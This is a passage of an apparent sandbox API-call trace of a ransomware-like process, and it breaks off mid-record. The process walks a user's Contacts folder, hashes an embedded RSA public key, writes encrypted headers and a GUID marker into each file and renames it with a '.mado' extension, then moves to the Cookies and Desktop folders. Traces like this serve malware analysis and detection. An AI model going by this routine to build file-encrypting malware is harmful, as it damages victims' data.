lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0203.654] CloseHandle (hObject=0x63c) returned 1 [0203.655] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.mado")) returned 1 [0203.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80690 | out: hHeap=0x2c0000) returned 1 [0203.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.656] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3219e0 | out: hHeap=0x2c0000) returned 1 [0203.657] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0203.657] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned=".contact" [0203.657] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0203.658] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=1172) returned 1 [0203.658] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0203.660] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x46e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.660] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0203.662] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x494, lpOverlapped=0x0) returned 1 [0203.662] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.662] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.662] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0203.662] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321c00) returned 1 [0203.663] CryptCreateHash (in: hProv=0x321c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0203.663] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0203.663] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0203.663] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0203.663] GetLastError () returned 0x0 [0203.663] SetLastError (dwErrCode=0x0) [0203.663] GetLastError () returned 0x0 [0203.663] SetLastError (dwErrCode=0x0) [0203.663] GetLastError () returned 0x0 [0203.663] SetLastError (dwErrCode=0x0) [0203.663] GetLastError () returned 0x0 [0203.663] SetLastError (dwErrCode=0x0) [0203.663] GetLastError () returned 0x0 [0203.663] SetLastError (dwErrCode=0x0) [0203.663] GetLastError () returned 0x0 [0203.663] SetLastError (dwErrCode=0x0) [0203.663] GetLastError () returned 0x0 [0203.663] SetLastError (dwErrCode=0x0) [0203.663] GetLastError () returned 0x0 [0203.663] SetLastError (dwErrCode=0x0) [0203.663] GetLastError () returned 0x0 [0203.663] SetLastError (dwErrCode=0x0) [0203.663] GetLastError () returned 0x0 [0203.663] SetLastError (dwErrCode=0x0) [0203.663] GetLastError () returned 0x0 [0203.664] SetLastError (dwErrCode=0x0) [0203.664] GetLastError () returned 0x0 [0203.664] SetLastError (dwErrCode=0x0) [0203.664] GetLastError () returned 0x0 [0203.664] SetLastError (dwErrCode=0x0) [0203.664] GetLastError () returned 0x0 [0203.664] SetLastError (dwErrCode=0x0) [0203.664] GetLastError () returned 0x0 [0203.664] SetLastError (dwErrCode=0x0) [0203.664] GetLastError () returned 0x0 [0203.664] SetLastError (dwErrCode=0x0) [0203.664] CryptDestroyHash (hHash=0x32ef238) returned 1 [0203.664] CryptReleaseContext (hProv=0x321c00, dwFlags=0x0) returned 1 [0203.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0203.664] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0203.664] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0203.664] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0203.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0203.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0203.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x490) returned 0x3310808 [0203.664] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0203.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0203.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310ca0 [0203.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0203.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0203.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0203.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6db80 [0203.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdc68 [0203.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6dbc8 [0203.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd88 [0203.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdcf8 [0203.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd40 [0203.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd10 [0203.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0203.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3294350 [0203.665] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3294350, Size=0x218) returned 0x3b80690 [0203.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b808b0 [0203.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdcf8 | out: hHeap=0x2c0000) returned 1 [0203.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd10 | out: hHeap=0x2c0000) returned 1 [0203.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd40 | out: hHeap=0x2c0000) returned 1 [0203.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0203.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b808b0 | out: hHeap=0x2c0000) returned 1 [0203.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd40 [0203.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0203.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fdd10 [0203.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0203.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fdcf8 [0203.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0203.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x32b69d8 [0203.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0203.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0203.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0203.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b67078 [0203.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0203.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0203.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0203.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd10 | out: hHeap=0x2c0000) returned 1 [0203.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0203.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdcf8 | out: hHeap=0x2c0000) returned 1 [0203.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0203.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0203.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdd40 | out: hHeap=0x2c0000) returned 1 [0203.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0203.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0203.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80690 | out: hHeap=0x2c0000) returned 1 [0203.666] GetCurrentThreadId () returned 0x600 [0203.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b66078 [0203.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x323550 [0203.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0203.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0203.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0203.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0203.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0203.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b66180 [0203.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.666] GetCurrentThreadId () returned 0x600 [0203.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0203.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0203.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0203.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0203.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b66288 [0203.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0203.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0203.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0203.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b66390 [0203.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd40 [0203.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0203.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0203.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0203.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0203.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0203.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0203.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdcf8 [0203.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0203.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0203.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0203.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0203.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0203.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0203.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd10 [0203.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0203.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0203.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0203.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdce0 [0203.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0203.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd58 [0203.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0203.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0203.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd28 [0203.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0203.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdd70 [0203.668] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x494, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.668] WriteFile (in: hFile=0x63c, lpBuffer=0x3b66078*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b66078*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0203.668] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0203.668] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0203.668] CloseHandle (hObject=0x63c) returned 1 [0203.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0203.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b80690 [0203.669] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.mado")) returned 1 [0203.670] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0 [0203.670] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0203.671] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0203.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3578 [0203.671] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0203.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0203.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0203.671] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="Cookies\\" [0203.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0203.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6dbc8 [0203.671] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0203.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0203.671] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0203.671] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0203.671] PathFindFileNameW (pszPath="") returned="" [0203.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0203.671] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0xffffffff [0203.671] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0203.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3578 [0203.671] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0203.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0203.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0203.672] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0203.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0203.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6dbc8 [0203.672] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0203.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0203.672] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0203.672] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0203.672] PathFindFileNameW (pszPath="") returned="" [0203.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0203.672] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1e057380, ftLastAccessTime.dwHighDateTime=0x1d60a66, ftLastWriteTime.dwLowDateTime=0x1e057380, ftLastWriteTime.dwHighDateTime=0x1d60a66, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0203.672] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1e057380, ftLastAccessTime.dwHighDateTime=0x1d60a66, ftLastWriteTime.dwLowDateTime=0x1e057380, ftLastWriteTime.dwHighDateTime=0x1d60a66, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0203.672] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc540e50, ftCreationTime.dwHighDateTime=0x1d5dc74, ftLastAccessTime.dwLowDateTime=0x47fb8bc0, ftLastAccessTime.dwHighDateTime=0x1d5e054, 